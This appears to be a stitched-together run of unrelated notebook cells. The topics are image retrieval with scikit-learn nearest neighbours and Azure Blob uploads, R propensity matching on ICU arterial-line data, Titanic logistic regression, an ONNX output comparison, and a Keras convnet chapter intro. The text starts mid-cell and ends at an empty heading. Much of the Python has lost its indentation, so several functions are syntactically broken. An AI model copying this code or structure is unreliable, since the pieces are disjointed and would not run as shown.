f = open("ref_filenames.txt", 'w')
f.write('["')
f.writelines('",\n"'.join((i[len(DATA_PATH)+1:]).replace("/","_").replace("\\","_") for i in valid_features.keys()))
f.write('"]')
f.close()
# writing files to zipfiles, one by one
with ZipFile('ref_features.zip','w', zipfile.ZIP_DEFLATED) as zip:
zip.write("ref_features.txt")
with ZipFile('ref_filenames.zip','w', zipfile.ZIP_DEFLATED) as zip:
zip.write("ref_filenames.txt")
#print(valid_features_list[0][1])
# print(len(valid_features_list))
#print(test)
#c = np.savetxt('geekfile.gz', valid_features_list, fmt='%f', delimiter =', ', newline=']')
#a = open("geekfile.txt", 'r')# open file in read mode
#print("the file contains:")
#print(a.read())
#print(valid_features_list.shape)
# Build nearest neighbor object using the reference set
nn_orig = NearestNeighbors(algorithm='auto', metric='euclidean', n_neighbors=min(100,len(valid_features_list)))
nn_orig.fit(valid_features_list)
nn_orig
#Above changed from 'nn' to 'nn_orig' to demonstrate saving the nn object to disk and then restoring it from disk
```
Next, we create thumbnails of the reference images of at most 150x150 pixels in a new directory called 'small-150'.
```
import os
path_mr = 'small-150'
Path(path_mr).mkdir(parents=True, exist_ok=True)
MAX_SIZE = (150, 150)
def resize():
for root, dirs, files in os.walk(DATA_PATH):
for file in files:
if file.endswith(".jpg"):
fname = path_mr +'/' + root[len(DATA_PATH)+1:] + '_' + file
im = PIL.Image.open(os.path.join(root, file))
im.thumbnail(MAX_SIZE)
im.save(fname, 'JPEG', quality=70)
resize()
```
Next we upload the files to Azure Blob storage
```
import os, uuid
import azure.storage.blob
from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient, ContentSettings
# Check Storage SDK version number
print(f"Azure Blob Storage SDK Version: {azure.storage.blob.VERSION}")
azure_storage_connection_str = 'YOUR_CONNECTION_STRING'
container_name = 'YOUR_CONTAINER_NAME'
local_files = ['ref_filenames.zip','ref_features.zip','../visualize/index.html','../visualize/dist/jszip.min.js','../visualize/dist/jszip-utils.min.js']
blob_files = ['data/ref_filenames.zip','data/ref_features.zip','index.html','dist/jszip.min.js','dist/jszip-utils.min.js']
# Create the BlobServiceClient object which will be used to create a container client
blob_service_client = BlobServiceClient.from_connection_string(azure_storage_connection_str)
# Upload the individual files for the front-end and the ZIP files for reference features
i = 0
while (i < len(local_files)):
# Create a blob client using the local file name as the name for the blob
blob_client = blob_service_client.get_blob_client(container=container_name, blob=blob_files[i])
# Upload the file
with open(local_files[i], "rb") as data:
if (i==2):
blob_client.upload_blob(data, overwrite=True, content_settings=ContentSettings(content_type="text/html"))
else:
blob_client.upload_blob(data, overwrite=True)
i+=1
# Upload the thumbnail versions of the reference images
path_mr = 'small-150'
for root, dirs, files in os.walk(path_mr):
for file in files:
# Create a blob client using the local file name as the name for the blob
blob_client = blob_service_client.get_blob_client(container=container_name, blob=path_mr+'/'+file)
# Upload the file
with open(os.path.join(path_mr, file), "rb") as data:
blob_client.upload_blob(data, overwrite=True)
```
Next, we export the fitted nearest-neighbor object to disk (saved as a Python "pickle" binary file).
```
# Import the pickle library to allow saving python objects to disk
import pickle
# Open the file in binary write mode
nn_pickle = open('nnreference_file', 'wb')
# Serialize the fitted nearest-neighbor object into the file and close it
pickle.dump(nn_orig, nn_pickle)
nn_pickle.close()
```
Next, we load the saved nearest-neighbor object from disk for further processing and queries.
```
nn = pickle.load(open('nnreference_file', 'rb'))
query_im_path = str(data.valid_ds.items[1])
query_feature = valid_features[query_im_path]
print(f"Query image path: {query_im_path}")
print(f"Query feature dimension: {len(query_feature)}")
assert len(query_feature) == 512 # For Resnet-18 model
```
Finally, we use the nearest neighbor object for image retrieval. It is important that the query feature is normalized in exactly the same way as the features used to initialize the nearest-neighbor object.
```
# Normalize the query feature vector to be of unit length
query_feature /= np.linalg.norm(query_feature, 2)
query_feature = np.reshape(query_feature, (-1, len(query_feature)))
# Query the nearest neighbor object to find the top most similar reference images
approx_distances, approx_im_indices = nn.kneighbors(query_feature)
# Display the results
approx_im_paths = [str(data.valid_ds.items[i]) for i in approx_im_indices[0]]
plot_distances(list(zip(approx_im_paths, approx_distances[0])),
num_rows=1, num_cols=8, figsize=(17,5))
# Compute features for the training set from which query images will be randomly selected
train_features = compute_features_learner(data, DatasetType.Train, learn, embedding_layer)
print(f"Computed DNN features for the {len(list(train_features))} training images, \
each consisting of {len(train_features[list(train_features)[0]])} floating point values.")
```
## Retrieval speed
This section compares retrieval times of exhaustive search versus approximate nearest neighbor search by running the respective algorithms multiple times.
Exhaustive search is fast for the small dataset provided with this notebook. However, even for a modestly sized dataset of 5,000 images, exhaustive search already takes 0.1 seconds per query while nearest-neighbor search takes 5 ms, a 20-times speedup at virtually no loss in accuracy. For a dataset of 100,000 images, exhaustive search increases to 2.1 seconds, while our nearest neighbor search remains 20 times faster.
Further speed-ups (possibly at the cost of retrieval accuracy) can be obtained by selecting different parameters for the *NearestNeighbors* object. For more information on this topic see the [scikit-learn site](https://scikit-learn.org/stable/modules/neighbors.html).
```
%%timeit
query_im_path = str(np.random.choice(data.train_ds.items))
query_feature = train_features[query_im_path]
distances = compute_distances(query_feature, valid_features)
%%timeit
query_im_path = str(np.random.choice(data.train_ds.items))
query_feature = train_features[query_im_path]
query_feature /= np.linalg.norm(query_feature, 2)
query_feature = np.reshape(query_feature, (-1, len(query_feature)))
approx_distances, approx_im_indices = nn.kneighbors(query_feature)
```
## Retrieval accuracy
Nearest neighbor methods are much faster than brute-force search, but can sometimes be incorrect: given a query image, the most similar image returned by the nearest neighbor object may in fact not have the lowest L2 distance.
To measure retrieval accuracy we use brute-force search to find the *true* image with the lowest distance, and then check at what rank our nearest neighbor search places this image. Ideally the approximate nearest neighbor method also identifies the *true* image as the one with minimum distance, i.e. it has a rank of 1; the higher the rank, the worse.
The code below computes the average of this rank using 100 randomly and independently selected query images. Interestingly, even for a large dataset of 100,000 images, we found that in the majority of cases the output of the nearest neighbor search is identical to that of brute-force search, just much faster.
```
ranks = []
for iter in tqdm(range(NUM_RANK_ITER)):
# Get random query image
query_im_path = str(np.random.choice(data.train_ds.items))
query_feature = train_features[query_im_path]
assert len(query_feature) == 512
# Find closest match (ie. most similar image) using brute-force search
bf_distances_and_paths = compute_distances(query_feature, valid_features)
bf_distances = [d for (p,d) in bf_distances_and_paths]
bf_closest_match_path = bf_distances_and_paths[np.argmin(bf_distances)][0]
# Find closest match (ie. most similar image) using nearest-neighbor search
query_feature /= np.linalg.norm(query_feature, 2)
query_feature = np.reshape(query_feature, (-1, len(query_feature)))
approx_distances, approx_im_indices = nn.kneighbors(query_feature)
# Find at what position (ie rank) the brute-force result is within the nearest-neighbor search result
# Best: rank 1.
approx_im_paths = [str(data.valid_ds.items[i]) for i in approx_im_indices[0]]
rank = np.where(np.array(approx_im_paths) == bf_closest_match_path)[0]
assert len(rank) == 1
assert approx_im_paths[int(rank)] == bf_closest_match_path
ranks.append(float(rank)+1)
print(f"The median rank over {len(ranks)} runs with {len(valid_features)} reference images is {np.median(ranks)}, and average rank is {np.mean(ranks)}.")
# Display the distribution of ranks
plot_ranks_distribution(ranks)
# Log some outputs using scrapbook which are used during testing to verify correct notebook execution
sb.glue("feature_dimension", len(query_feature[0]))
sb.glue("median_rank", np.median(ranks))
```
```
system("ln -s /home/ec2-user/anaconda3/envs/R_Beta/bin/x86_64-conda_cos6-linux-gnu-c++ /home/ec2-user/anaconda3/bin/x86_64-conda_cos6-linux-gnu-c++")
system("ln -s /home/ec2-user/anaconda3/envs/R_Beta/bin/x86_64-conda_cos6-linux-gnu-cc /home/ec2-user/anaconda3/bin/x86_64-conda_cos6-linux-gnu-cc")
install.packages('pROC')
install.packages('Matching')
knitr::opts_chunk$set(echo = TRUE)
wdpath = path.expand("./")
setwd(wdpath)
dataset = read.csv(file="aline_data.csv",head=TRUE,sep=",")
dataset$icustay_id = factor(dataset$icustay_id)
dataset$day_28_flag = factor(dataset$day_28_flag, levels=c(0,1))
dataset$gender = factor(dataset$gender, levels=c("F","M"))
dataset$day_icu_intime = factor(dataset$day_icu_intime)
dataset$hour_icu_intime = factor(dataset$hour_icu_intime)
dataset$icu_hour_flag = factor(dataset$icu_hour_flag, levels=c(0,1))
#dataset$sepsis_flag = factor(dataset$sepsis_flag, levels=c(0,1))
dataset$sedative_flag = factor(dataset$sedative_flag, levels=c(0,1))
dataset$fentanyl_flag = factor(dataset$fentanyl_flag, levels=c(0,1))
dataset$midazolam_flag = factor(dataset$midazolam_flag, levels=c(0,1))
dataset$propofol_flag = factor(dataset$propofol_flag, levels=c(0,1))
#dataset$dilaudid_flag = factor(dataset$dilaudid_flag, levels=c(0,1))
dataset$chf_flag = factor(dataset$chf_flag, levels=c(0,1))
dataset$afib_flag = factor(dataset$afib_flag, levels=c(0,1))
dataset$renal_flag = factor(dataset$renal_flag, levels=c(0,1))
dataset$liver_flag = factor(dataset$liver_flag, levels=c(0,1))
dataset$copd_flag = factor(dataset$copd_flag, levels=c(0,1))
dataset$cad_flag = factor(dataset$cad_flag, levels=c(0,1))
dataset$stroke_flag = factor(dataset$stroke_flag, levels=c(0,1))
dataset$malignancy_flag = factor(dataset$malignancy_flag, levels=c(0,1))
dataset$respfail_flag = factor(dataset$respfail_flag, levels=c(0,1))
dataset$ards_flag = factor(dataset$ards_flag, levels=c(0,1))
dataset$pneumonia_flag = factor(dataset$pneumonia_flag, levels=c(0,1))
# custom factor
dataset$service_surg = factor( dataset$service_unit == 'SURG', levels=c(FALSE,TRUE))
# we could impute data if we like - e.g. the below imputes the mean
# we currently do complete case analysis however
imputeFlag = 0
if (imputeFlag != 0){
print("Imputing missing data for some features...")
for (col in c("weight_first","temp_first","spo2_first",
"bun_first","creatinine_first", "chloride_first", "hgb_first",
"platelet_first", "potassium_first", "sodium_first", "tco2_first", "wbc_first"))
{
print(paste("Imputing data for: ", col))
dataset[is.na(dataset[,col]),col] = mean(dataset[,col], na.rm=TRUE)
}
}
# subselect the variables
dat = dataset[,c("aline_flag",
"age","gender","weight_first","sofa_first","service_surg",
"day_icu_intime","hour_icu_intime",
"chf_flag","afib_flag","renal_flag",
"liver_flag","copd_flag","cad_flag","stroke_flag",
"malignancy_flag","respfail_flag",
"map_first","hr_first","temp_first","spo2_first",
"bun_first","chloride_first","creatinine_first",
"hgb_first","platelet_first",
"potassium_first","sodium_first","tco2_first","wbc_first")]
idxKeep = complete.cases(dat)
dat = dat[idxKeep,]
y <- dataset[idxKeep,"day_28_flag"]
print(paste('Removed', sum(!idxKeep),'rows with missing data.'))
# fit GLM
glm_fitted = glm(aline_flag ~ ., data=dat, family="binomial", na.action = na.exclude)
# run step-wise AIC
library(MASS);
glm_fitted <- stepAIC(glm_fitted )
X <- fitted(glm_fitted, type="response")
Tr <- dat$aline_flag
library("pROC")
roccurve <- roc(Tr ~ X)
plot(roccurve, col=rainbow(7), main="ROC curve", xlab="Specificity", ylab="Sensitivity")
auc(roccurve)
# plot stacked histogram of the predictions
xrange = seq(0,1,0.01)
# subset the predictions by treatment group
g1 = subset(X,Tr==0)
g2 = subset(X,Tr==1)
# use hist to compute the counts per interval
h1 = hist(g1,breaks=xrange,plot=F)$counts
h2 = hist(g2,breaks=xrange,plot=F)$counts
barplot(rbind(h1,h2),col=3:2,names.arg=xrange[-1],
legend.text=c("No aline","Aline"),space=0,las=1,main="Stacked histogram of X")
library(Matching)
set.seed(43770)
ps <- Match(Y=NULL, Tr=Tr, X=X, M=1, estimand='ATT', caliper=0.1, exact=FALSE, replace=FALSE);
# get pairs with treatment/outcome as cols
outcome <- data.frame(aline_pt=y[ps$index.treated], match_pt=y[ps$index.control])
head(outcome)
# mcnemar's test to see if iac related to mort (test should use matched pairs)
tab.match1 <- table(outcome$aline_pt,outcome$match_pt,dnn=c("Aline","Matched Control"))
tab.match1
tab.match1[1,2]/tab.match1[2,1]
paste("95% Confint", round(exp(c(log(tab.match1[2,1]/tab.match1[1,2]) - qnorm(0.975)*sqrt(1/tab.match1[1,2] +1/tab.match1[2,1]),log(tab.match1[2,1]/tab.match1[1,2]) + qnorm(0.975)*sqrt(1/tab.match1[1,2] +1/tab.match1[2,1])) ),2))
mcnemar.test(tab.match1) # for 1-1 pairs
```
# Logistic regression exercise with Titanic data
## Introduction
- Data from Kaggle's Titanic competition: [data](https://github.com/justmarkham/DAT8/blob/master/data/titanic.csv), [data dictionary](https://www.kaggle.com/c/titanic/data)
- **Goal**: Predict survival based on passenger characteristics
- `titanic.csv` is already in our repo, so there is no need to download the data from the Kaggle website
## Step 1: Read the data into Pandas
```
# Import libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
import sklearn
import seaborn as sns
import warnings
warnings.filterwarnings('ignore')
plt.rcParams["figure.figsize"] = [10,5]
url = 'https://raw.githubusercontent.com/justmarkham/DAT8/master/data/titanic.csv'
titanic = pd.read_csv(url, index_col='PassengerId')
titanic.head()
titanic.info()
# Heatmap
sns.heatmap(titanic.isnull(),yticklabels = False, cbar = False,cmap = 'tab20c_r')
plt.title('Missing Data: Training Set')
plt.show()
plt.figure(figsize = (10,7))
sns.boxplot(x = 'Pclass', y = 'Age', data = titanic, palette= 'GnBu_d').set_title('Age by Passenger Class')
plt.show()
# Imputation function
def impute_age(cols):
    Age = cols['Age']
    Pclass = cols['Pclass']
if pd.isnull(Age):
if Pclass == 1:
return 37
elif Pclass == 2:
return 29
else:
return 24
else:
return Age
# Apply the function to the Age column
titanic['Age'] = titanic[['Age','Pclass']].apply(impute_age, axis=1)
# Remove Cabin feature
titanic.drop('Cabin', axis = 1, inplace = True)
# Remove rows with missing data
titanic.dropna(inplace = True)
# Data types
print(titanic.info())
# Identify non-null objects
print('\n')
print('Non-Null Objects to Be Converted to Category')
print(titanic.select_dtypes(['object']).columns)
# Remove unnecessary columns
titanic.drop(['Name','Ticket'], axis = 1, inplace = True)
# Convert objects to category data type
objcat = ['Sex','Embarked']
for colname in objcat:
titanic[colname] = titanic[colname].astype('category')
# Numeric summary
titanic.describe().transpose()
# Survival Count
print('Target Variable')
print(titanic.groupby(['Survived']).Survived.count())
# Target Variable Countplot
sns.set_style('darkgrid')
plt.figure(figsize = (10,5))
sns.countplot(titanic['Survived'], alpha =.80, palette= ['grey','lightgreen'])
plt.title('Survivors vs Non-Survivors')
plt.ylabel('# Passengers')
plt.show()
# Note: a majority of passengers did not survive, so the mode (Survived = 0)
# would be the value to use when imputing missing values of the target.
# Identify numeric features
print('Continuous Variables')
print(titanic[['Age','Fare']].describe().transpose())
print('--'*40)
print('Discrete Variables')
print(titanic.groupby('Pclass').Pclass.count())
print(titanic.groupby('SibSp').SibSp.count())
print(titanic.groupby('Parch').Parch.count())
# Subplots of Numeric Features
sns.set_style('darkgrid')
fig = plt.figure(figsize = (20,16))
fig.subplots_adjust(hspace = .30)
ax1 = fig.add_subplot(321)
ax1.hist(titanic['Pclass'], bins = 20, alpha = .50,edgecolor= 'black',color ='teal')
ax1.set_xlabel('Pclass', fontsize = 15)
ax1.set_ylabel('# Passengers',fontsize = 15)
ax1.set_title('Passenger Class',fontsize = 15)
ax2 = fig.add_subplot(323)
ax2.hist(titanic['Age'], bins = 20, alpha = .50,edgecolor= 'black',color ='teal')
ax2.set_xlabel('Age',fontsize = 15)
ax2.set_ylabel('# Passengers',fontsize = 15)
ax2.set_title('Age of Passengers',fontsize = 15)
ax3 = fig.add_subplot(325)
ax3.hist(titanic['SibSp'], bins = 20, alpha = .50,edgecolor= 'black',color ='teal')
ax3.set_xlabel('SibSp',fontsize = 15)
ax3.set_ylabel('# Passengers',fontsize = 15)
ax3.set_title('Passengers with Spouses or Siblings',fontsize = 15)
ax4 = fig.add_subplot(222)
ax4.hist(titanic['Parch'], bins = 20, alpha = .50,edgecolor= 'black',color ='teal')
ax4.set_xlabel('Parch',fontsize = 15)
ax4.set_ylabel('# Passengers',fontsize = 15)
ax4.set_title('Passengers with Children',fontsize = 15)
ax5 = fig.add_subplot(224)
ax5.hist(titanic['Fare'], bins = 20, alpha = .50,edgecolor= 'black',color ='teal')
ax5.set_xlabel('Fare',fontsize = 15)
ax5.set_ylabel('# Passengers',fontsize = 15)
ax5.set_title('Ticket Fare',fontsize = 15)
plt.show()
# Passenger class summary
print('Passenger Class Summary')
print('\n')
print(titanic.groupby(['Pclass','Survived']).Pclass.count().unstack())
# Passenger class visualization
pclass = titanic.groupby(['Pclass','Survived']).Pclass.count().unstack()
p1 = pclass.plot(kind = 'bar', stacked = True,
title = 'Passengers by Class: Survivors vs Non-Survivors',
color = ['grey','lightgreen'], alpha = .70)
p1.set_xlabel('Pclass')
p1.set_ylabel('# Passengers')
p1.legend(['Did Not Survive','Survived'])
plt.show()
# SibSp Summary
print('Passengers with Siblings or Spouse')
print('\n')
print(titanic.groupby(['SibSp','Survived']).SibSp.count().unstack())
sibsp = titanic.groupby(['SibSp','Survived']).SibSp.count().unstack()
p2 = sibsp.plot(kind = 'bar', stacked = True,
color = ['grey','lightgreen'], alpha = .70)
p2.set_title('Passengers with Siblings or Spouse: Survivors vs Non-Survivors')
p2.set_xlabel('Sibsp')
p2.set_ylabel('# Passengers')
p2.legend(['Did Not Survive','Survived'])
plt.show()
print(titanic.groupby(['Parch','Survived']).Parch.count().unstack())
parch = titanic.groupby(['Parch','Survived']).Parch.count().unstack()
p3 = parch.plot(kind = 'bar', stacked = True,
color = ['grey','lightgreen'], alpha = .70)
p3.set_title('Passengers with Children: Survivors vs Non-Survivors')
p3.set_xlabel('Parch')
p3.set_ylabel('# Passengers')
p3.legend(['Did Not Survive','Survived'])
plt.show()
# titanic.hist(bins=10,figsize=(9,7),grid=False)
# Statistical summary of continuous variables
print('Statistical Summary of Age and Fare')
print('\n')
print('Did Not Survive')
print(titanic[titanic['Survived']==0][['Age','Fare']].describe().transpose())
print('--'*40)
print('Survived')
print(titanic[titanic['Survived']==1][['Age','Fare']].describe().transpose())
# Subplots of Numeric Features
sns.set_style('darkgrid')
fig = plt.figure(figsize = (16,10))
fig.subplots_adjust(hspace = .30)
ax1 = fig.add_subplot(221)
ax1.hist(titanic[titanic['Survived'] ==0].Age, bins = 25, label ='Did Not Survive', alpha = .50,edgecolor= 'black',color ='grey')
ax1.hist(titanic[titanic['Survived']==1].Age, bins = 25, label = 'Survived', alpha = .50, edgecolor = 'black',color = 'lightgreen')
ax1.set_title('Passenger Age: Survivors vs Non-Survivors')
ax1.set_xlabel('Age')
ax1.set_ylabel('# Passengers')
ax1.legend(loc = 'upper right')
ax2 = fig.add_subplot(223)
ax2.hist(titanic[titanic['Survived']==0].Fare, bins = 25, label = 'Did Not Survive', alpha = .50, edgecolor ='black', color = 'grey')
ax2.hist(titanic[titanic['Survived']==1].Fare, bins = 25, label = 'Survived', alpha = .50, edgecolor = 'black',color ='lightgreen')
ax2.set_title('Ticket Fare: Survivors vs Non-Survivors')
ax2.set_xlabel('Fare')
ax2.set_ylabel('# Passengers')
ax2.legend(loc = 'upper right')
ax3 = fig.add_subplot(122)
ax3.scatter(x = titanic[titanic['Survived']==0].Age, y = titanic[titanic['Survived']==0].Fare,
alpha = .50,edgecolor= 'black', c = 'grey', s= 75, label = 'Did Not Survive')
ax3.scatter(x = titanic[titanic['Survived']==1].Age, y = titanic[titanic['Survived']==1].Fare,
alpha = .50,edgecolors= 'black', c = 'lightgreen', s= 75, label = 'Survived')
ax3.set_xlabel('Age')
ax3.set_ylabel('Fare')
ax3.set_title('Age of Passengers vs Fare')
ax3.legend()
plt.show()
# Notes:
# - With density=True instead of raw counts, the histograms would show proportions.
# - Many passengers paid nothing for their ticket; they were likely crew
#   (no siblings/spouses, no children, mostly in the middle age range).
# - The relationship between age and the log-odds of survival is definitely not linear.
# - A feature worth engineering to capture this: a dummy variable for whether the
#   passenger is a child, since survival chances appear to vary with age group.
# Identify categorical features
titanic.select_dtypes(['category']).columns
# Subplots of categorical features
sns.set_style('darkgrid')
f, axes = plt.subplots(1,2, figsize = (15,5))
# Plot [0]
sns.countplot(x = 'Sex', data = titanic, palette = 'GnBu_d', ax = axes[0])
axes[0].set_xlabel('Sex')
axes[0].set_ylabel('# Passengers')
axes[0].set_title('Gender of Passengers')
# Plot [1]
sns.countplot(x = 'Embarked', data = titanic, palette = 'GnBu_d',ax = axes[1])
axes[1].set_xlabel('Embarked')
axes[1].set_ylabel('# Passengers')
axes[1].set_title('Embarked')
plt.show()
# Subplots of categorical features vs survival
sns.set_style('darkgrid')
f, axes = plt.subplots(1,2, figsize = (20,7))
gender = titanic.groupby(['Sex','Survived']).Sex.count().unstack()
p1 = gender.plot(kind = 'bar', stacked = True,
title = 'Gender: Survivors vs Non-Survivors',
color = ['grey','lightgreen'], alpha = .70, ax = axes[0])
p1.set_xlabel('Sex')
p1.set_ylabel('# Passengers')
p1.legend(['Did Not Survive','Survived'])
embarked = titanic.groupby(['Embarked','Survived']).Embarked.count().unstack()
p2 = embarked.plot(kind = 'bar', stacked = True,
title = 'Embarked: Survivors vs Non-Survivors',
color = ['grey','lightgreen'], alpha = .70, ax = axes[1])
p2.set_xlabel('Embarked')
p2.set_ylabel('# Passengers')
p2.legend(['Did Not Survive','Survived'])
plt.show()
# Shape of train data
titanic.shape
# Identify categorical features
titanic.select_dtypes(['category']).columns
# Convert categorical variables into 'dummy' or indicator variables
sex = pd.get_dummies(titanic['Sex'], drop_first = True) # drop_first prevents multi-collinearity
embarked = pd.get_dummies(titanic['Embarked'], drop_first = True)
# Add new dummy columns to data frame
titanic = pd.concat([titanic, sex, embarked], axis = 1)
titanic.head(2)
# Drop unnecessary columns
titanic.drop(['Sex', 'Embarked'], axis = 1, inplace = True)
# Shape of train data
print('train_data shape',titanic.shape)
# Confirm changes
titanic.head()
```
## Step 2: Create X and y
Define all remaining columns as the features, and **Survived** as the response.
```
# Split data to be used in the models
# Create matrix of features
X = titanic.drop('Survived', axis = 1) # grabs everything else but 'Survived'
# Create target variable
y = titanic['Survived'] # y is the column we're trying to predict
```
## Step 3: Split the data into training and testing sets
```
# Use x and y variables to split the training data into train and test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1)
```
## Step 4: Fit a logistic regression model and examine the coefficients
Confirm that the coefficients make intuitive sense.
```
from sklearn.linear_model import LogisticRegression
logreg = LogisticRegression()
logreg.fit(X_train, y_train)
list(zip(X_train.columns, logreg.coef_[0]))  # pair each feature with its coefficient
logreg.coef_
```
## Step 5: Make predictions on the testing set and calculate the accuracy
```
# class predictions (not predicted probabilities)
y_pred_class = logreg.predict(X_test)
# calculate classification accuracy
from sklearn import metrics
print(metrics.accuracy_score(y_test, y_pred_class))
```
## Step 6: Compare your testing accuracy to the null accuracy
```
# this works regardless of the number of classes
y_test.value_counts().head(1) / len(y_test)
# this only works for binary classification problems coded as 0/1
max(y_test.mean(), 1 - y_test.mean())
```
# Confusion matrix of Titanic predictions
```
# print confusion matrix
print(metrics.confusion_matrix(y_test, y_pred_class))
# save confusion matrix and slice into four pieces
confusion = metrics.confusion_matrix(y_test, y_pred_class)
TP = confusion[1][1]
TN = confusion[0][0]
FP = confusion[0][1]
FN = confusion[1][0]
print ('True Positives:', TP)
print ('True Negatives:', TN)
print ('False Positives:', FP)
print ('False Negatives:', FN)
# calculate the sensitivity
print(TP / float(TP + FN))
print(44 / float(44 + 51))
# calculate the specificity
print (TN / float(TN + FP))
print (105 / float(105 + 23))
# store the predicted probabilities
y_pred_prob = logreg.predict_proba(X_test)[:, 1]
# histogram of predicted probabilities
%matplotlib inline
import matplotlib.pyplot as plt
plt.hist(y_pred_prob)
plt.xlim(0, 1)
plt.xlabel('Predicted probability of survival')
plt.ylabel('Frequency')
# increase sensitivity by lowering the threshold for predicting survival
import numpy as np
y_pred_class = np.where(y_pred_prob > 0.3, 1, 0)
# old confusion matrix
print (confusion)
# new confusion matrix
print (metrics.confusion_matrix(y_test, y_pred_class))
# new sensitivity (higher than before)
print (63 / float(63 + 32))
# new specificity (lower than before)
print (72 / float(72 + 56))
```
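The confusion-matrix bookkeeping above generalizes naturally; the following helper (a sketch, not part of the original notebook) derives the same metrics from any 2x2 matrix in scikit-learn's `[[TN, FP], [FN, TP]]` layout:

```python
def confusion_stats(cm):
    """Derive common metrics from a 2x2 confusion matrix laid out as
    [[TN, FP], [FN, TP]], which is scikit-learn's convention."""
    (tn, fp), (fn, tp) = cm
    return {
        'accuracy': (tp + tn) / (tp + tn + fp + fn),
        'sensitivity': tp / (tp + fn),   # recall for the positive class
        'specificity': tn / (tn + fp),
    }

# the counts from the original 0.5-threshold confusion matrix above
print(confusion_stats([[105, 23], [51, 44]]))
```

Lowering the decision threshold moves counts from the FN cell into the TP cell (raising sensitivity) and from the TN cell into the FP cell (lowering specificity).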
```
import onnx
from onnx import shape_inference
import warnings
from onnx_tf.backend import prepare
import numpy as np
def stride_print(input):
    # print roughly 20 evenly strided samples of a flattened tensor
    tensor = input.flatten().tolist()
    length = len(tensor)
    size = 20
    stride = length // size
    if stride == 0:
        stride = 1
    size = length // stride
    nums = [str(tensor[i * stride]) for i in range(0, size)]
    print(nums)
dot = "•"
black = lambda x: "\033[30m" + str(x) + "\033[0m"
red = lambda x: "\033[31m" + str(x) + "\033[0m"
green = lambda x: "\033[32m" + str(x) + "\033[0m"
yellow = lambda x: "\033[33m" + str(x) + "\033[0m"
reset = lambda x: "\033[0m" + str(x)
def pp_tab(x, level=0):
header = ""
for i in range(0, level):
header += "\t"
print(header + str(x))
def pp_black(x, level=0):
pp_tab(black(x) + reset(""), level)
def pp_red(x, level=0):
pp_tab(red(x) + reset(""), level)
def pp_green(x, level=0):
pp_tab(green(x) + reset(""), level)
def pp_yellow(x, level=0):
pp_tab(yellow(x) + reset(""), level)
diff_threshold = 0.05
def compare(input):
    stride_print(input)
    tensor = input.flatten().tolist()
    length = len(tensor)
    size = 20
    stride = length // size
    if stride == 0:
        stride = 1
    size = length // stride
    nums = [tensor[i * stride] for i in range(0, size)]
    diff_sum = 0
    is_pass = True
    # input_paddle is a global list of reference values (as strings),
    # assigned before each call to compare()
    for i in range(0, size):
        right_v = nums[i]
        paddle_v = float(input_paddle[i])
        diff = abs(right_v - paddle_v)
        diff_sum += diff
        if diff > diff_threshold:
            is_pass = False
            print("err at {} {} {}".format(i, right_v, paddle_v))
    if is_pass:
        pp_green("passed with avg diff of {}".format(diff_sum / size))
    else:
        pp_red("not pass!")
model = onnx.load("v18_7_6_2_leakyReLU_rgb_mask_test_t2.onnx")
onnx.checker.check_model(model)
inferred_model = shape_inference.infer_shapes(model)
model.graph.output.extend(inferred_model.graph.value_info)
warnings.filterwarnings('ignore')
tfm = prepare(model)
# input = np.fromfile('input', dtype=np.float32).reshape(1, 3, 256, 256)
input = np.loadtxt('./input_1_3_256_256',
dtype=np.float32).reshape(1, 3, 256, 256)
res = tfm.run(input)
input_paddle = "0.53125 0.549316 0.558594 0.677246 0.470703 0.634766 0.540039 0.566406 0.495605 0.597168 0.602539 0.480957 0.448486 0.553711 0.474365 0.612793 0.609863 0.518555 0.617188 0.505371 0.504395".split(" ")
compare(res["mask"])
input_paddle = "0.245117 -0.222656 0.0887451 0.803711 0.639648 0.0995483 0.807129 -0.224609 -0.267578 0.33667 0.372559 -0.353516 0.343262 0.549805 0.344971 0.503906 0.152466 -0.0531616 0.0315247 -0.0397034 -0.218262".split(" ")
compare(res["rgb"])
```
```
import keras
keras.__version__
```
# 5.2 - Using convnets with small datasets
This notebook contains the code sample found in Chapter 5, Section 2 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.
## Training a convnet from scratch on a small dataset
Having to train an image classification model using only very little data is a common situation, which you likely encounter yourself in
practice if you ever do computer vision in a professional context.
Having "few" samples can mean anywhere from a few hundred to a few tens of thousands of images. As a practical example, we will focus on
classifying images as "dogs" or "cats", in a dataset containing 4000 pictures of cats and dogs (2000 cats, 2000 dogs). We will use 2000
pictures for training, 1000 for validation, and finally 1000 for testing.
In this section, we will review one basic strategy to tackle this problem: training a new model from scratch on what little data we have. We
will start by naively training a small convnet on our 2000 training samples, without any regularization, to set a baseline for what can be
achieved. This will get us to a classification accuracy of 71%. At that point, our main issue will be overfitting. Then we will introduce
*data augmentation*, a powerful technique for mitigating overfitting in computer vision. By leveraging data augmentation, we will improve
our network to reach an accuracy of 82%.
In the next section, we will review two more essential techniques for applying deep learning to small datasets: *doing feature extraction
with a pre-trained network* (this will get us to an accuracy of 90% to 93%), and *fine-tuning a pre-trained network* (this will get us to
our final accuracy of 95%). Together, these three strategies -- training a small model from scratch, doing feature extracting using a
pre-trained model, and fine-tuning a pre-trained model -- will constitute your future toolbox for tackling the problem of doing computer
vision with small datasets.
## The relevance of deep learning for small-data problems
You will sometimes hear that deep learning only works when lots of data is available. This is in part a valid point: one fundamental
characteristic of deep learning is that it is able to find interesting features in the training data on its own, without any need for manual
feature engineering, and this can only be achieved when lots of training examples are available. This is especially true for problems where
the input samples are very high-dimensional, like images.
However, what constitutes "lots" of samples is relative -- relative to the size and depth of the network you are trying to train, for
starters. It isn't possible to train a convnet to solve a complex problem with just a few tens of samples, but a few hundred can
potentially suffice if the model is small and well-regularized and if the task is simple.
Because convnets learn local, translation-invariant features, they are very
data-efficient on perceptual problems. Training a convnet from scratch on a very small image dataset will still yield reasonable results
despite a relative lack of data, without the need for any custom feature engineering. You will see this in action in this section.
But what's more, deep learning models are by nature highly repurposable: you can take, say, an image classification or speech-to-text model
trained on a large-scale dataset then reuse it on a significantly different problem with only minor changes. Specifically, in the case of
computer vision, many pre-trained models (usually trained on the ImageNet dataset) are now publicly available for download and can be used
to bootstrap powerful vision models out of very little data. That's what we will do in the next section.
For now, let's get started by getting our hands on the data.
## Downloading the data
